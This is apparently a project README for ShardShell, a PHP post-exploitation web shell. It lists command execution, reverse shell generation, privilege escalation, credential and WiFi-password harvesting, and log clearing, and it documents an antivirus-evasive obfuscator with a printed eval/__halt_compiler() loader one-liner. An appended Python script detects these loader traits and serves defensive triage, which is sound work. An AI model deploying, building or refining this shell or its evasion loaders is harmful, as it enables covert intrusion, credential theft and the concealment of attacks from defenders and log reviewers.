Authorized use only. ShardShell is a PHP post-exploitation shell for red team engagements with explicit written authorization. Using it against systems you don't own or aren't contracted to test is illegal in most jurisdictions. The authors accept no liability for misuse.
Advanced PHP web shell built for authorized penetration testing and red team engagements. Two versions: Linux and Windows, each tuned with OS-native commands and priv-esc vectors.
| File | Target OS | Notes |
|---|---|---|
| `shell-linux.php` | Linux / macOS | Uses /proc, find -perm, crontab, ss, etc. |
| `shell-windows.php` | Windows / IIS | Uses whoami /priv, wmic, schtasks, netstat -ano, registry checks, etc. |
Both versions share the same core framework and UI. OS-specific modules differ as shown:
| Module | Linux | Windows |
|---|---|---|
| Dashboard | System stats, PHP config | Same |
| File Manager | Browse, edit, upload, download, hex view, chmod | Same (minus chmod) |
| Terminal | sh commands, session history | cmd.exe commands, session history |
| System Recon | /proc, ps aux, cron, /etc/passwd | systeminfo, tasklist, schtasks, net user, whoami /all |
| Network Tools | Port scan, revshell gen (11 types), dig | Port scan, revshell gen (11 types incl. PowerShell/mshta), nslookup |
| Database | MySQL, SQLite | MySQL, MSSQL (sqlsrv), SQLite |
| Priv-Esc | SUID/SGID, capabilities, kernel CVEs, sudo, container detection | Token privileges, unquoted service paths, AlwaysInstallElevated, AutoLogon, stored creds, WiFi passwords, AV detection |
| Encoding | Base64, Hex, URL, HTML, ROT13, hashing | Same |
| Stealth | Apache/Nginx/syslog clearing, bash history | Windows Event Log clearing (wevtutil), IIS log clearing, PowerShell history |
Drop the appropriate version into any PHP-enabled web server directory.
```bash
# Local test
php -S 0.0.0.0:8888 -t .
```

Default password: admin. Change $CONF['passwd'] at the top of the file.
ShardShell ships with a build-time obfuscator that produces hardened, AV-evasive PHP shell variants from clean source. The builder runs as a Python 3 CLI — no PHP runtime needed at build time.
```bash
# Build all variants (standard + loader)
./build/build.sh --all
# Build with lint verification (requires podman or php-cli)
./build/build.sh --all --lint
# Custom build
python3 build/obfuscate.py shell-linux.php -o shell-obf.php
python3 build/obfuscate.py shell-linux.php --loader -o shell-enc.php
```

| Level | Techniques |
|---|---|
| `none` | Comment stripping + minification only |
| `standard` (default) | Comment stripping, XOR+base64 string encoding, variable renaming, safe minification |
| `aggressive` | All above + function call indirection |
Wraps the entire obfuscated payload in a self-decrypting loader:
- XOR payload with a 32-byte random key
- GZip compress (level 9)
- Base64 encode
- Ship as `<?php ... @eval("?>".gzinflate(XOR(base64_decode(payload),key))) ?>`
The original shell never appears in plaintext — even strings shows nothing recognizable. Loader output is ~37% the size of the original.
| Technique | Effect |
|---|---|
| String encoding | All single-quoted string literals → _sXXXX("base64...") calls, decoded at runtime with embedded XOR key |
| Variable renaming | $command, $result, etc. → random identifiers (superglobals preserved) |
| Comment stripping | Removes //, #, /* */ comments; correctly handles ?> within comments |
| Minification | Collapses PHP whitespace only; HTML/CSS/JS blocks left intact |
| Function indirection (aggressive) | exec() → _f('exec')(), shell_exec() → _f('shell_exec')() via runtime lookup |
| File | Typical Size |
|---|---|
| `dist/shell-linux-obf.php` | ~105 KB |
| `dist/shell-windows-obf.php` | ~110 KB |
| `dist/shell-linux-loader.php` | ~35 KB |
| `dist/shell-windows-loader.php` | ~37 KB |
For bare-metal deployments, wrap with a __halt_compiler() loader:
```php
<?php $f=str_rot13("onfr64_qrpbqr");eval('?>'.$f(substr(file_get_contents(__FILE__),__COMPILER_HALT_OFFSET__+1)));__halt_compiler();
{base64 encoded shell here}
```

This tool is intended exclusively for authorized security assessments and penetration testing under a valid contract or written authorization. Unauthorized use against systems you do not own or have explicit permission to test is illegal. The author assumes no liability for misuse.
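For defenders triaging a web root, the loader mode, string encoding and `__halt_compiler()` wrapper described above all leave static traits that remain visible even though the payload itself is unreadable. The Python script below is an added example, not part of ShardShell: the indicator names, the thresholds, the `SENSITIVE` list and the sample strings are constructed assumptions, and the `_s...` helper pattern is inferred from the technique table.

```python
import codecs
import re

# Names worth hiding behind str_rot13(); an assumed, non-exhaustive list.
SENSITIVE = {"base64_decode", "gzinflate", "eval", "assert", "exec",
             "shell_exec", "system", "passthru"}
B64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")  # threshold is an assumption
ROT13_ARG = re.compile(r"str_rot13\s*\(\s*(['\"])([A-Za-z0-9_]+)\1\s*\)")
ENC_CALL = re.compile(r"\b_s\w+\s*\(\s*\"[A-Za-z0-9+/=]{4,}\"\s*\)")


def has_call(name: str, code: str) -> bool:
    return re.search(r"\b" + re.escape(name) + r"\s*\(", code) is not None


def indicators(src: str) -> list[str]:
    """Return the loader-style traits found in one PHP source string."""
    hits = []
    code, halt, _data = src.partition("__halt_compiler()")
    # Loader mode: eval() fed by a decode/decompress chain.
    if all(has_call(n, code) for n in ("eval", "gzinflate", "base64_decode")):
        hits.append("eval+gzinflate+base64_decode")
    # Function names recovered at runtime from ROT13 literals.
    for m in ROT13_ARG.finditer(code):
        plain = codecs.decode(m.group(2), "rot13").lower()
        if plain in SENSITIVE:
            hits.append("rot13-hidden:" + plain)
    # __halt_compiler() loader: eval() over data read from the file's own tail.
    if halt and "__COMPILER_HALT_OFFSET__" in code and has_call("eval", code):
        hits.append("eval-of-halt-compiler-data")
    # String encoding: many calls to _s... helpers with base64 literals.
    if len(ENC_CALL.findall(src)) >= 10:
        hits.append("encoded-string-helper")
    if B64_RUN.search(src):
        hits.append("long-base64-run")
    return hits


# Constructed, inert samples shaped like the two loader forms on this page.
SAMPLE_LOADER = ('<?php @eval("?>".gzinflate(x(base64_decode("'
                 + "A" * 240 + '"),$k))); ?>')
SAMPLE_HALT = ('<?php $f=str_rot13("onfr64_qrpbqr");eval(\'?>\'.$f(substr('
               'file_get_contents(__FILE__),__COMPILER_HALT_OFFSET__+1)));'
               '__halt_compiler();\n' + "A" * 240)
SAMPLE_BENIGN = '<?php $png = base64_decode($row["thumb"]); echo $png; ?>'

if __name__ == "__main__":
    for name in ("SAMPLE_LOADER", "SAMPLE_HALT", "SAMPLE_BENIGN"):
        print(name, indicators(globals()[name]))
```

Any single hit is a reason to review the file, not a verdict; pair the output with file-integrity baselines and web server logs for the same path.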
MIT - see LICENSE.
| Repo | What it does |
|---|---|
| ShardLure | SSH honeypot + threat-intel dashboard |
| ShardC2 | Red-team C2 framework in Go |
| ShardFlow | Layer-2 LAN workbench (ARP, drop, throttle) |
| ShardShell | PHP post-exploitation shell |
| ShardPass | Minimal TOTP authenticator (Chrome MV3) |
| ShardPet | Pixel-Pokémon browser extension |